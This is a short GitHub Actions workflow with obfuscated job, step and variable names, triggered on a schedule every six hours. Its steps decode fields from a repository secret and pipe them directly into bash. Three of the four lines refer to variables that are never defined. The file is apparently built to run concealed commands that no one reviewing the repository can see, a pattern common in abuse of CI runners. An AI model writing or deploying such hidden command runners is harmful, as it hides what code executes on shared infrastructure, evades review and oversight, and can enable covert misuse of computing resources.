name: xianghuaguo3451

on:
  workflow_dispatch:
  schedule:
    - cron: '41 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          bvh7371: ${{ secrets.bvh7371 }}
        run: |
          echo $bvh7371 | jq -r .nl355 | /bin/bash
          echo $li3697 | jq -r .kdjl7 | /bin/bash
          echo $nrzh230 | jq -r .eyy6 | /bin/bash
          echo $pb4337 | jq -r .mse1 | /bin/bash

